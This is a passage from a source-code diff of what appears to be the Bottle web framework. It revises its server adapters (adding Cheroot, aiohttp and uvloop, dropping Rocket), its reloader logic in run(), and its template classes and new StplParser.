server_cls, + handler_cls) + self.port = self.srv.server_port # update port actual port (0 means random) + try: + self.srv.serve_forever() + except KeyboardInterrupt: + self.srv.server_close() # Prevent ResourceWarning: unclosed socket + raise class CherryPyServer(ServerAdapter): + def run(self, handler): # pragma: no cover + depr(0, 13, "The wsgi server part of cherrypy was split into a new " + "project called 'cheroot'.", "Use the 'cheroot' server " + "adapter instead of cherrypy.") + from cherrypy import wsgiserver # This will fail for CherryPy >= 9 + + self.options['bind_addr'] = (self.host, self.port) + self.options['wsgi_app'] = handler + + certfile = self.options.get('certfile') + if certfile: + del self.options['certfile'] + keyfile = self.options.get('keyfile') + if keyfile: + del self.options['keyfile'] + + server = wsgiserver.CherryPyWSGIServer(**self.options) + if certfile: + server.ssl_certificate = certfile + if keyfile: + server.ssl_private_key = keyfile + + try: + server.start() + finally: + server.stop() + + +class CherootServer(ServerAdapter): def run(self, handler): # pragma: no cover - from cherrypy import wsgiserver - server = wsgiserver.CherryPyWSGIServer((self.host, self.port), handler) + from cheroot import wsgi + from cheroot.ssl import builtin + self.options['bind_addr'] = (self.host, self.port) + self.options['wsgi_app'] = handler + certfile = self.options.pop('certfile', None) + keyfile = self.options.pop('keyfile', None) + chainfile = self.options.pop('chainfile', None) + server = wsgi.Server(**self.options) + if certfile and keyfile: + server.ssl_adapter = builtin.BuiltinSSLAdapter( + certfile, keyfile, chainfile) try: server.start() finally: @@ -2403,17 +3586,17 @@ def run(self, handler): # pragma: no cover class WaitressServer(ServerAdapter): def run(self, handler): from waitress import serve - serve(handler, host=self.host, port=self.port) + serve(handler, host=self.host, port=self.port, _quiet=self.quiet, **self.options) class PasteServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover from paste import httpserver - if not self.quiet: - from paste.translogger import TransLogger - handler = TransLogger(handler) - httpserver.serve(handler, host=self.host, port=str(self.port), - **self.options) + from paste.translogger import TransLogger + handler = TransLogger(handler, setup_console_handler=(not self.quiet)) + httpserver.serve(handler, + host=self.host, + port=str(self.port), **self.options) class MeinheldServer(ServerAdapter): @@ -2424,8 +3607,10 @@ def run(self, handler): class FapwsServer(ServerAdapter): - """ Extremely fast webserver using libev. See http://www.fapws.org/ """ - def run(self, handler): # pragma: no cover + """ Extremely fast webserver using libev. See https://github.com/william-os4y/fapws3 """ + + def run(self, handler): # pragma: no cover + depr(0, 13, "fapws3 is not maintained and support will be dropped.") import fapws._evwsgi as evwsgi from fapws import base, config port = self.port @@ -2435,30 +3620,36 @@ def run(self, handler): # pragma: no cover evwsgi.start(self.host, port) # fapws3 never releases the GIL. Complain upstream. I tried. No luck. if 'BOTTLE_CHILD' in os.environ and not self.quiet: - _stderr("WARNING: Auto-reloading does not work with Fapws3.\n") - _stderr(" (Fapws3 breaks python thread support)\n") + _stderr("WARNING: Auto-reloading does not work with Fapws3.") + _stderr(" (Fapws3 breaks python thread support)") evwsgi.set_base_module(base) + def app(environ, start_response): environ['wsgi.multiprocess'] = False return handler(environ, start_response) + evwsgi.wsgi_cb(('', app)) evwsgi.run() class TornadoServer(ServerAdapter): """ The super hyped asynchronous server by facebook. Untested. """ - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover import tornado.wsgi, tornado.httpserver, tornado.ioloop container = tornado.wsgi.WSGIContainer(handler) server = tornado.httpserver.HTTPServer(container) - server.listen(port=self.port) + server.listen(port=self.port, address=self.host) tornado.ioloop.IOLoop.instance().start() class AppEngineServer(ServerAdapter): """ Adapter for Google App Engine. """ quiet = True + def run(self, handler): + depr(0, 13, "AppEngineServer no longer required", + "Configure your application directly in your app.yaml") from google.appengine.ext.webapp import util # A main() function in the handler script enables 'App Caching'. # Lets makes sure it is there. This _really_ improves performance. @@ -2470,6 +3661,7 @@ def run(self, handler): class TwistedServer(ServerAdapter): """ Untested. """ + def run(self, handler): from twisted.web import server, wsgi from twisted.python.threadpool import ThreadPool @@ -2479,12 +3671,15 @@ def run(self, handler): reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop) factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler)) reactor.listenTCP(self.port, factory, interface=self.host) - reactor.run() + if not reactor.running: + reactor.run() class DieselServer(ServerAdapter): """ Untested. """ + def run(self, handler): + depr(0, 13, "Diesel is not tested or supported and will be removed.") from diesel.protocols.wsgi import WSGIApplication app = WSGIApplication(handler, port=self.port) app.run() @@ -2493,30 +3688,41 @@ def run(self, handler): class GeventServer(ServerAdapter): """ Untested. Options: - * `fast` (default: False) uses libevent's http server, but has some - issues: No streaming, no pipelining, no SSL. + * See gevent.wsgi.WSGIServer() documentation for more options. """ + def run(self, handler): - from gevent import wsgi, pywsgi, local - if not isinstance(_lctx, local.local): + from gevent import pywsgi, local + if not isinstance(threading.local(), local.local): msg = "Bottle requires gevent.monkey.patch_all() (before import)" raise RuntimeError(msg) - if not self.options.get('fast'): wsgi = pywsgi - log = None if self.quiet else 'default' - wsgi.WSGIServer((self.host, self.port), handler, log=log).serve_forever() + if self.quiet: + self.options['log'] = None + address = (self.host, self.port) + server = pywsgi.WSGIServer(address, handler, **self.options) + if 'BOTTLE_CHILD' in os.environ: + import signal + signal.signal(signal.SIGINT, lambda s, f: server.stop()) + server.serve_forever() class GunicornServer(ServerAdapter): """ Untested. See http://gunicorn.org/configure.html for options. """ + def run(self, handler): - from gunicorn.app.base import Application + from gunicorn.app.base import BaseApplication + + if self.host.startswith("unix:"): + config = {'bind': self.host} + else: + config = {'bind': "%s:%d" % (self.host, self.port)} - config = {'bind': "%s:%d" % (self.host, int(self.port))} config.update(self.options) - class GunicornApplication(Application): - def init(self, parser, opts, args): - return config + class GunicornApplication(BaseApplication): + def load_config(self): + for key, value in config.items(): + self.cfg.set(key, value) def load(self): return handler @@ -2525,35 +3731,83 @@ def load(self): class EventletServer(ServerAdapter): - """ Untested """ + """ Untested. Options: + + * `backlog` adjust the eventlet backlog parameter which is the maximum + number of queued connections. Should be at least 1; the maximum + value is system-dependent. + * `family`: (default is 2) socket family, optional. See socket + documentation for available families. + """ + def run(self, handler): - from eventlet import wsgi, listen + from eventlet import wsgi, listen, patcher + if not patcher.is_monkey_patched(os): + msg = "Bottle requires eventlet.monkey_patch() (before import)" + raise RuntimeError(msg) + socket_args = {} + for arg in ('backlog', 'family'): + try: + socket_args[arg] = self.options.pop(arg) + except KeyError: + pass + address = (self.host, self.port) try: - wsgi.server(listen((self.host, self.port)), handler, + wsgi.server(listen(address, **socket_args), handler, log_output=(not self.quiet)) except TypeError: # Fallback, if we have old version of eventlet - wsgi.server(listen((self.host, self.port)), handler) - - -class RocketServer(ServerAdapter): - """ Untested. """ - def run(self, handler): - from rocket import Rocket - server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler }) - server.start() + wsgi.server(listen(address), handler) class BjoernServer(ServerAdapter): """ Fast server written in C: https://github.com/jonashaag/bjoern """ + def run(self, handler): from bjoern import run - run(handler, self.host, self.port) + run(handler, self.host, self.port, reuse_port=True) + +class AsyncioServerAdapter(ServerAdapter): + """ Extend ServerAdapter for adding custom event loop """ + def get_event_loop(self): + pass + +class AiohttpServer(AsyncioServerAdapter): + """ Asynchronous HTTP client/server framework for asyncio + https://pypi.python.org/pypi/aiohttp/ + https://pypi.org/project/aiohttp-wsgi/ + """ + + def get_event_loop(self): + import asyncio + return asyncio.new_event_loop() + + def run(self, handler): + import asyncio + from aiohttp_wsgi.wsgi import serve + self.loop = self.get_event_loop() + asyncio.set_event_loop(self.loop) + + if 'BOTTLE_CHILD' in os.environ: + import signal + signal.signal(signal.SIGINT, lambda s, f: self.loop.stop()) + + serve(handler, host=self.host, port=self.port) + +class AiohttpUVLoopServer(AiohttpServer): + """uvloop + https://github.com/MagicStack/uvloop + """ + def get_event_loop(self): + import uvloop + return uvloop.new_event_loop() class AutoServer(ServerAdapter): """ Untested. """ - adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer] + adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, + CherootServer, WSGIRefServer] + def run(self, handler): for sa in self.adapters: try: @@ -2561,12 +3815,14 @@ def run(self, handler): except ImportError: pass + server_names = { 'cgi': CGIServer, 'flup': FlupFCGIServer, 'wsgiref': WSGIRefServer, 'waitress': WaitressServer, 'cherrypy': CherryPyServer, + 'cheroot': CherootServer, 'paste': PasteServer, 'fapws3': FapwsServer, 'tornado': TornadoServer, @@ -2577,16 +3833,12 @@ def run(self, handler): 'gunicorn': GunicornServer, 'eventlet': EventletServer, 'gevent': GeventServer, - 'rocket': RocketServer, - 'bjoern' : BjoernServer, + 'bjoern': BjoernServer, + 'aiohttp': AiohttpServer, + 'uvloop': AiohttpUVLoopServer, 'auto': AutoServer, } - - - - - ############################################################################### # Application Control ########################################################## ############################################################################### @@ -2616,19 +3868,30 @@ def load_app(target): """ Load a bottle application from a module and make sure that the import does not affect the current default application, but returns a separate application object. See :func:`load` for the target parameter. """ - global NORUN; NORUN, nr_old = True, NORUN + global NORUN + NORUN, nr_old = True, NORUN + tmp = default_app.push() # Create a new "default application" try: - tmp = default_app.push() # Create a new "default application" - rv = load(target) # Import the target module + rv = load(target) # Import the target module return rv if callable(rv) else tmp finally: - default_app.remove(tmp) # Remove the temporary added default application + default_app.remove(tmp) # Remove the temporary added default application NORUN = nr_old + _debug = debug -def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, - interval=1, reloader=False, quiet=False, plugins=None, - debug=False, **kargs): + + +def run(app=None, + server='wsgiref', + host='127.0.0.1', + port=8080, + interval=1, + reloader=False, + quiet=False, + plugins=None, + debug=None, + config=None, **kargs): """ Start a server instance. This method blocks until the server terminates. :param app: WSGI application or target string supported by @@ -2647,22 +3910,27 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, """ if NORUN: return if reloader and not os.environ.get('BOTTLE_CHILD'): + import subprocess + fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock') + environ = os.environ.copy() + environ['BOTTLE_CHILD'] = 'true' + environ['BOTTLE_LOCKFILE'] = lockfile + args = [sys.executable] + sys.argv + # If a package was loaded with `python -m`, then `sys.argv` needs to be + # restored to the original value, or imports might break. See #1336 + if getattr(sys.modules.get('__main__'), '__package__', None): + args[1:1] = ["-m", sys.modules['__main__'].__package__] + try: - lockfile = None - fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock') - os.close(fd) # We only need this file to exist. We never write to it + os.close(fd) # We never write to this file while os.path.exists(lockfile): - args = [sys.executable] + sys.argv - environ = os.environ.copy() - environ['BOTTLE_CHILD'] = 'true' - environ['BOTTLE_LOCKFILE'] = lockfile p = subprocess.Popen(args, env=environ) - while p.poll() is None: # Busy wait... - os.utime(lockfile, None) # I am alive! + while p.poll() is None: + os.utime(lockfile, None) # Tell child we are still alive time.sleep(interval) - if p.poll() != 3: - if os.path.exists(lockfile): os.unlink(lockfile) - sys.exit(p.poll()) + if p.returncode == 3: # Child wants to be restarted + continue + sys.exit(p.returncode) except KeyboardInterrupt: pass finally: @@ -2671,7 +3939,7 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, return try: - _debug(debug) + if debug is not None: _debug(debug) app = app or default_app() if isinstance(app, basestring): app = load_app(app) @@ -2679,8 +3947,13 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, raise ValueError("Application is not callable: %r" % app) for plugin in plugins or []: + if isinstance(plugin, basestring): + plugin = load(plugin) app.install(plugin) + if config: + app.config.update(config) + if server in server_names: server = server_names.get(server) if isinstance(server, basestring): @@ -2692,9 +3965,14 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, server.quiet = server.quiet or quiet if not server.quiet: - _stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server))) - _stderr("Listening on http://%s:%d/\n" % (server.host, server.port)) - _stderr("Hit Ctrl-C to quit.\n\n") + _stderr("Bottle v%s server starting up (using %s)..." % + (__version__, repr(server))) + if server.host.startswith("unix:"): + _stderr("Listening on %s" % server.host) + else: + _stderr("Listening on http://%s:%d/" % + (server.host, server.port)) + _stderr("Hit Ctrl-C to quit.\n") if reloader: lockfile = os.environ.get('BOTTLE_LOCKFILE') @@ -2717,24 +3995,24 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, sys.exit(3) - class FileCheckerThread(threading.Thread): - ''' Interrupt main-thread as soon as a changed module file is detected, - the lockfile gets deleted or gets to old. ''' + """ Interrupt main-thread as soon as a changed module file is detected, + the lockfile gets deleted or gets too old. """ def __init__(self, lockfile, interval): threading.Thread.__init__(self) + self.daemon = True self.lockfile, self.interval = lockfile, interval #: Is one of 'reload', 'error' or 'exit' self.status = None def run(self): exists = os.path.exists - mtime = lambda path: os.stat(path).st_mtime + mtime = lambda p: os.stat(p).st_mtime files = dict() for module in list(sys.modules.values()): - path = getattr(module, '__file__', '') + path = getattr(module, '__file__', '') or '' if path[-4:] in ('.pyo', '.pyc'): path = path[:-1] if path and exists(path): files[path] = mtime(path) @@ -2753,32 +4031,31 @@ def run(self): def __enter__(self): self.start() - def __exit__(self, exc_type, exc_val, exc_tb): - if not self.status: self.status = 'exit' # silent exit + def __exit__(self, exc_type, *_): + if not self.status: self.status = 'exit' # silent exit self.join() return exc_type is not None and issubclass(exc_type, KeyboardInterrupt) - - - - ############################################################################### # Template Adapters ############################################################ ############################################################################### -class TemplateError(HTTPError): - def __init__(self, message): - HTTPError.__init__(self, 500, message) +class TemplateError(BottleException): + pass class BaseTemplate(object): """ Base class and minimal API for template adapters """ - extensions = ['tpl','html','thtml','stpl'] - settings = {} #used in prepare() - defaults = {} #used in render() - - def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings): + extensions = ['tpl', 'html', 'thtml', 'stpl'] + settings = {} #used in prepare() + defaults = {} #used in render() + + def __init__(self, + source=None, + name=None, + lookup=None, + encoding='utf8', **settings): """ Create a new template. If the source parameter (str or buffer) is missing, the name argument is used to guess a template filename. Subclasses can assume that @@ -2792,10 +4069,10 @@ def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **setting self.name = name self.source = source.read() if hasattr(source, 'read') else source self.filename = source.filename if hasattr(source, 'filename') else None - self.lookup = [os.path.abspath(x) for x in lookup] + self.lookup = [os.path.abspath(x) for x in lookup] if lookup else [] self.encoding = encoding - self.settings = self.settings.copy() # Copy from class variable - self.settings.update(settings) # Apply + self.settings = self.settings.copy() # Copy from class variable + self.settings.update(settings) # Apply if not self.source and self.name: self.filename = self.search(self.name, self.lookup) if not self.filename: @@ -2805,16 +4082,15 @@ def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **setting self.prepare(**self.settings) @classmethod - def search(cls, name, lookup=[]): + def search(cls, name, lookup=None): """ Search name in all directories specified in lookup. First without, then with common extensions. Return first hit. """ if not lookup: - depr('The template lookup path list should not be empty.') - lookup = ['.'] + raise depr(0, 12, "Empty template lookup path.", "Configure a template lookup path.") - if os.path.isabs(name) and os.path.isfile(name): - depr('Absolute template path names are deprecated.') - return os.path.abspath(name) + if os.path.isabs(name): + raise depr(0, 12, "Use of absolute path for template name.", + "Refer to templates with names or paths relative to the lookup path.") for spath in lookup: spath = os.path.abspath(spath) + os.sep @@ -2827,9 +4103,9 @@ def search(cls, name, lookup=[]): @classmethod def global_config(cls, key, *args): - ''' This reads or sets the global settings stored in class.settings. ''' + """ This reads or sets the global settings stored in class.settings. """ if args: - cls.settings = cls.settings.copy() # Make settings local to class + cls.settings = cls.settings.copy() # Make settings local to class cls.settings[key] = args[0] else: return cls.settings[key] @@ -2845,8 +4121,8 @@ def render(self, *args, **kwargs): """ Render the template with the specified local variables and return a single byte or unicode string. If it is a byte string, the encoding must match self.encoding. This method must be thread-safe! - Local variables may be provided in dictionaries (*args) - or directly, as keywords (**kwargs). + Local variables may be provided in dictionaries (args) + or directly, as keywords (kwargs). """ raise NotImplementedError @@ -2855,16 +4131,19 @@ class MakoTemplate(BaseTemplate): def prepare(self, **options): from mako.template import Template from mako.lookup import TemplateLookup - options.update({'input_encoding':self.encoding}) + options.update({'input_encoding': self.encoding}) options.setdefault('format_exceptions', bool(DEBUG)) lookup = TemplateLookup(directories=self.lookup, **options) if self.source: self.tpl = Template(self.source, lookup=lookup, **options) else: - self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options) + self.tpl = Template(uri=self.name, + filename=self.filename, + lookup=lookup, **options) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) @@ -2882,7 +4161,8 @@ def prepare(self, **options): self.tpl = Template(file=self.filename, **options) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) self.context.vars.update(self.defaults) self.context.vars.update(kwargs) out = str(self.tpl) @@ -2891,218 +4171,315 @@ def render(self, *args, **kwargs): class Jinja2Template(BaseTemplate): - def prepare(self, filters=None, tests=None, **kwargs): + def prepare(self, filters=None, tests=None, globals={}, **kwargs): from jinja2 import Environment, FunctionLoader - if 'prefix' in kwargs: # TODO: to be removed after a while - raise RuntimeError('The keyword argument `prefix` has been removed. ' - 'Use the full jinja2 environment name line_statement_prefix instead.') self.env = Environment(loader=FunctionLoader(self.loader), **kwargs) if filters: self.env.filters.update(filters) if tests: self.env.tests.update(tests) + if globals: self.env.globals.update(globals) if self.source: self.tpl = self.env.from_string(self.source) else: - self.tpl = self.env.get_template(self.filename) + self.tpl = self.env.get_template(self.name) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) def loader(self, name): - fname = self.search(name, self.lookup) + if name == self.filename: + fname = name + else: + fname = self.search(name, self.lookup) if not fname: return with open(fname, "rb") as f: - return f.read().decode(self.encoding) - - -class SimpleTALTemplate(BaseTemplate): - ''' Deprecated, do not use. ''' - def prepare(self, **options): - depr('The SimpleTAL template handler is deprecated'\ - ' and will be removed in 0.12') - from simpletal import simpleTAL - if self.source: - self.tpl = simpleTAL.compileHTMLTemplate(self.source) - else: - with open(self.filename, 'rb') as fp: - self.tpl = simpleTAL.compileHTMLTemplate(tonat(fp.read())) - - def render(self, *args, **kwargs): - from simpletal import simpleTALES - for dictarg in args: kwargs.update(dictarg) - context = simpleTALES.Context() - for k,v in self.defaults.items(): - context.addGlobal(k, v) - for k,v in kwargs.items(): - context.addGlobal(k, v) - output = StringIO() - self.tpl.expand(context, output) - return output.getvalue() + return (f.read().decode(self.encoding), fname, lambda: False) class SimpleTemplate(BaseTemplate): - blocks = ('if', 'elif', 'else', 'try', 'except', 'finally', 'for', 'while', - 'with', 'def', 'class') - dedent_blocks = ('elif', 'else', 'except', 'finally') - - @lazy_attribute - def re_pytokens(cls): - ''' This matches comments and all kinds of quoted strings but does - NOT match comments (#...) within quoted strings. (trust me) ''' - return re.compile(r''' - (''(?!')|""(?!")|'{6}|"{6} # Empty strings (all 4 types) - |'(?:[^\\']|\\.)+?' # Single quotes (') - |"(?:[^\\"]|\\.)+?" # Double quotes (") - |'{3}(?:[^\\]|\\.|\n)+?'{3} # Triple-quoted strings (') - |"{3}(?:[^\\]|\\.|\n)+?"{3} # Triple-quoted strings (") - |\#.* # Comments - )''', re.VERBOSE) - - def prepare(self, escape_func=html_escape, noescape=False, **kwargs): + def prepare(self, + escape_func=html_escape, + noescape=False, + syntax=None, **ka): self.cache = {} enc = self.encoding self._str = lambda x: touni(x, enc) self._escape = lambda x: escape_func(touni(x, enc)) + self.syntax = syntax if noescape: self._str, self._escape = self._escape, self._str - @classmethod - def split_comment(cls, code): - """ Removes comments (#...) from python code. """ - if '#' not in code: return code - #: Remove comments only (leave quoted strings as they are) - subf = lambda m: '' if m.group(0)[0]=='#' else m.group(0) - return re.sub(cls.re_pytokens, subf, code) - @cached_property def co(self): return compile(self.code, self.filename or '<string>', 'exec') @cached_property def code(self): - stack = [] # Current Code indentation - lineno = 0 # Current line of code - ptrbuffer = [] # Buffer for printable strings and token tuple instances - codebuffer = [] # Buffer for generated python code - multiline = dedent = oneline = False - template = self.source or open(self.filename, 'rb').read() - - def yield_tokens(line): - for i, part in enumerate(re.split(r'\{\{(.*?)\}\}', line)): - if i % 2: - if part.startswith('!'): yield 'RAW', part[1:] - else: yield 'CMD', part - else: yield 'TXT', part - - def flush(): # Flush the ptrbuffer - if not ptrbuffer: return - cline = '' - for line in ptrbuffer: - for token, value in line: - if token == 'TXT': cline += repr(value) - elif token == 'RAW': cline += '_str(%s)' % value - elif token == 'CMD': cline += '_escape(%s)' % value - cline += ', ' - cline = cline[:-2] + '\\\n' - cline = cline[:-2] - if cline[:-1].endswith('\\\\\\\\\\n'): - cline = cline[:-7] + cline[-1] # 'nobr\\\\\n' --> 'nobr' - cline = '_printlist([' + cline + '])' - del ptrbuffer[:] # Do this before calling code() again - code(cline) - - def code(stmt): - for line in stmt.splitlines(): - codebuffer.append(' ' * len(stack) + line.strip()) - - for line in template.splitlines(True): - lineno += 1 - line = touni(line, self.encoding) - sline = line.lstrip() - if lineno <= 2: - m = re.match(r"%\s*#.*coding[:=]\s*([-\w.]+)", sline) - if m: self.encoding = m.group(1) - if m: line = line.replace('coding','coding (removed)') - if sline and sline[0] == '%' and sline[:2] != '%%': - line = line.split('%',1)[1].lstrip() # Full line following the % - cline = self.split_comment(line).strip() - cmd = re.split(r'[^a-zA-Z0-9_]', cline)[0] - flush() # You are actually reading this? Good luck, it's a mess :) - if cmd in self.blocks or multiline: - cmd = multiline or cmd - dedent = cmd in self.dedent_blocks # "else:" - if dedent and not oneline and not multiline: - cmd = stack.pop() - code(line) - oneline = not cline.endswith(':') # "if 1: pass" - multiline = cmd if cline.endswith('\\') else False - if not oneline and not multiline: - stack.append(cmd) - elif cmd == 'end' and stack: - code('#end(%s) %s' % (stack.pop(), line.strip()[3:])) - elif cmd == 'include': - p = cline.split(None, 2)[1:] - if len(p) == 2: - code("_=_include(%s, _stdout, %s)" % (repr(p[0]), p[1])) - elif p: - code("_=_include(%s, _stdout)" % repr(p[0])) - else: # Empty %include -> reverse of %rebase - code("_printlist(_base)") - elif cmd == 'rebase': - p = cline.split(None, 2)[1:] - if len(p) == 2: - code("globals()['_rebase']=(%s, dict(%s))" % (repr(p[0]), p[1])) - elif p: - code("globals()['_rebase']=(%s, {})" % repr(p[0])) - else: - code(line) - else: # Line starting with text (not '%') or '%%' (escaped) - if line.strip().startswith('%%'): - line = line.replace('%%', '%', 1) - ptrbuffer.append(yield_tokens(line)) - flush() - return '\n'.join(codebuffer) + '\n' - - def subtemplate(self, _name, _stdout, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + source = self.source + if not source: + with open(self.filename, 'rb') as f: + source = f.read() + try: + source, encoding = touni(source), 'utf8' + except UnicodeError: + raise depr(0, 11, 'Unsupported template encodings.', 'Use utf-8 for templates.') + parser = StplParser(source, encoding=encoding, syntax=self.syntax) + code = parser.translate() + self.encoding = parser.encoding + return code + + def _rebase(self, _env, _name=None, **kwargs): + _env['_rebase'] = (_name, kwargs) + + def _include(self, _env, _name=None, **kwargs): + env = _env.copy() + env.update(kwargs) if _name not in self.cache: - self.cache[_name] = self.__class__(name=_name, lookup=self.lookup) - return self.cache[_name].execute(_stdout, kwargs) + self.cache[_name] = self.__class__(name=_name, lookup=self.lookup, syntax=self.syntax) + return self.cache[_name].execute(env['_stdout'], env) - def execute(self, _stdout, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + def execute(self, _stdout, kwargs): env = self.defaults.copy() - env.update({'_stdout': _stdout, '_printlist': _stdout.extend, - '_include': self.subtemplate, '_str': self._str, - '_escape': self._escape, 'get': env.get, - 'setdefault': env.setdefault, 'defined': env.__contains__}) env.update(kwargs) - eval(self.co, env) - if '_rebase' in env: - subtpl, rargs = env['_rebase'] - rargs['_base'] = _stdout[:] #copy stdout - del _stdout[:] # clear stdout - return self.subtemplate(subtpl,_stdout,rargs) + env.update({ + '_stdout': _stdout, + '_printlist': _stdout.extend, + 'include': functools.partial(self._include, env), + 'rebase': functools.partial(self._rebase, env), + '_rebase': None, + '_str': self._str, + '_escape': self._escape, + 'get': env.get, + 'setdefault': env.setdefault, + 'defined': env.__contains__ + }) + exec(self.co, env) + if env.get('_rebase'): + subtpl, rargs = env.pop('_rebase') + rargs['base'] = ''.join(_stdout) #copy stdout + del _stdout[:] # clear stdout + return self._include(env, subtpl, **rargs) return env def render(self, *args, **kwargs): """ Render the template using keyword arguments as local variables. """ - for dictarg in args: kwargs.update(dictarg) + env = {} stdout = [] - self.execute(stdout, kwargs) + for dictarg in args: + env.update(dictarg) + env.update(kwargs) + self.execute(stdout, env) return ''.join(stdout) -def template(*args, **kwargs): +class StplSyntaxError(TemplateError): + pass + + +class StplParser(object): + """ Parser for stpl templates. """ + _re_cache = {} #: Cache for compiled re patterns + + # This huge pile of voodoo magic splits python code into 8 different tokens. + # We use the verbose (?x) regex mode to make this more manageable + + _re_tok = r'''( + [urbURB]* + (?: ''(?!') + |""(?!") + |'{6} + |"{6} + |'(?:[^\\']|\\.)+?' + |"(?:[^\\"]|\\.)+?" + |'{3}(?:[^\\]|\\.|\n)+?'{3} + |"{3}(?:[^\\]|\\.|\n)+?"{3} + ) + )''' + + _re_inl = _re_tok.replace(r'|\n', '') # We re-use this string pattern later + + _re_tok += r''' + # 2: Comments (until end of line, but not the newline itself) + |(\#.*) + + # 3: Open and close (4) grouping tokens + |([\[\{\(]) + |([\]\}\)]) + + # 5,6: Keywords that start or continue a python block (only start of line) + |^([\ \t]*(?:if|for|while|with|try|def|class)\b) + |^([\ \t]*(?:elif|else|except|finally)\b) + + # 7: Our special 'end' keyword (but only if it stands alone) + |((?:^|;)[\ \t]*end[\ \t]*(?=(?:%(block_close)s[\ \t]*)?\r?$|;|\#)) + + # 8: A customizable end-of-code-block template token (only end of line) + |(%(block_close)s[\ \t]*(?=\r?$)) + + # 9: And finally, a single newline. The 10th token is 'everything else' + |(\r?\n) ''' + + # Match the start tokens of code areas in a template + _re_split = r'''(?m)^[ \t]*(\\?)((%(line_start)s)|(%(block_start)s))''' + # Match inline statements (may contain python strings) + _re_inl = r'''%%(inline_start)s((?:%s|[^'"\n])*?)%%(inline_end)s''' % _re_inl + + # add the flag in front of the regexp to avoid Deprecation warning (see Issue #949) + # verbose and dot-matches-newline mode + _re_tok = '(?mx)' + _re_tok + _re_inl = '(?mx)' + _re_inl + + + default_syntax = '<% %> % {{ }}' + + def __init__(self, source, syntax=None, encoding='utf8'): + self.source, self.encoding = touni(source, encoding), encoding + self.set_syntax(syntax or self.default_syntax) + self.code_buffer, self.text_buffer = [], [] + self.lineno, self.offset = 1, 0 + self.indent, self.indent_mod = 0, 0 + self.paren_depth = 0 + + def get_syntax(self): + """ Tokens as a space separated string (default: <% %> % {{ }}) """ + return self._syntax + + def set_syntax(self, syntax): + self._syntax = syntax + self._tokens = syntax.split() + if syntax not in self._re_cache: + names = 'block_start block_close line_start inline_start inline_end' + etokens = map(re.escape, self._tokens) + pattern_vars = dict(zip(names.split(), etokens)) + patterns = (self._re_split, self._re_tok, self._re_inl) + patterns = [re.compile(p % pattern_vars) for p in patterns] + self._re_cache[syntax] = patterns + self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax] + + syntax = property(get_syntax, set_syntax) + + def translate(self): + if self.offset: raise RuntimeError('Parser is a one time instance.') + while True: + m = self.re_split.search(self.source, pos=self.offset) + if m: + text = self.source[self.offset:m.start()] + self.text_buffer.append(text) + self.offset = m.end() + if m.group(1): # Escape syntax + line, sep, _ = self.source[self.offset:].partition('\n') + self.text_buffer.append(self.source[m.start():m.start(1)] + + m.group(2) + line + sep) + self.offset += len(line + sep) + continue + self.flush_text() + self.offset += self.read_code(self.source[self.offset:], + multiline=bool(m.group(4))) + else: + break + self.text_buffer.append(self.source[self.offset:]) + self.flush_text() + return ''.join(self.code_buffer) + + def read_code(self, pysource, multiline): + code_line, comment = '', '' + offset = 0 + while True: + m = self.re_tok.search(pysource, pos=offset) + if not m: + code_line += pysource[offset:] + offset = len(pysource) + self.write_code(code_line.strip(), comment) + break + code_line += pysource[offset:m.start()] + offset = m.end() + _str, _com, _po, _pc, _blk1, _blk2, _end, _cend, _nl = m.groups() + if self.paren_depth > 0 and (_blk1 or _blk2): # a if b else c + code_line += _blk1 or _blk2 + continue + if _str: # Python string + code_line += _str + elif _com: # Python comment (up to EOL) + comment = _com + if multiline and _com.strip().endswith(self._tokens[1]): + multiline = False # Allow end-of-block in comments + elif _po: # open parenthesis + self.paren_depth += 1 + code_line += _po + elif _pc: # close parenthesis + if self.paren_depth > 0: + # we could check for matching parentheses here, but it's + # easier to leave that to python - just check counts + self.paren_depth -= 1 + code_line += _pc + elif _blk1: # Start-block keyword (if/for/while/def/try/...) + code_line = _blk1 + self.indent += 1 + self.indent_mod -= 1 + elif _blk2: # Continue-block keyword (else/elif/except/...) + code_line = _blk2 + self.indent_mod -= 1 + elif _cend: # The end-code-block template token (usually '%>') + if multiline: multiline = False + else: code_line += _cend + elif _end: + self.indent -= 1 + self.indent_mod += 1 + else: # \n + self.write_code(code_line.strip(), comment) + self.lineno += 1 + code_line, comment, self.indent_mod = '', '', 0 + if not multiline: + break + + return offset + + def flush_text(self): + text = ''.join(self.text_buffer) + del self.text_buffer[:] + if not text: return + parts, pos, nl = [], 0, '\\\n' + ' ' * self.indent + for m in self.re_inl.finditer(text): + prefix, pos = text[pos:m.start()], m.end() + if prefix: + parts.append(nl.join(map(repr, prefix.splitlines(True)))) + if prefix.endswith('\n'): parts[-1] += nl + parts.append(self.process_inline(m.group(1).strip())) + if pos < 